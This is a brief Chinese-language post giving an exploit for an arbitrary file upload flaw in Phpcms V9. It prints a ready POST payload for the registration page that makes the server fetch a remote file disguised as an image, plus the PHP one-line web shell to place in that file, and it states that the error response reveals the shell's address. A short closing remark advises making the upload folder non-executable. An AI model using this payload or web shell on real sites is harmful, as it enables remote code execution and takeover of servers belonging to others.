Phpcms_V9任意文件上传( N day ...)
Phpcms_V9任意文件上传
下载最新版Phpcms,在注册页面进行post提交。
EXP:
siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://127.0.0.1/2.txt?.php#.jpg>&dosubmit=1&protocol=
2.txt中写入一句话:
<?php @eval($_POST[cmd]);?>
报错,并返回shell地址。
getshell。
感谢scriptkid大牛,该漏洞不只是注册处能触发,所以关闭注册是解决不了问题的,正确做法是让uploadfile下文件无法执行。
并且在注册页面中modelid=10,没有content字段,稍后会附上漏洞原理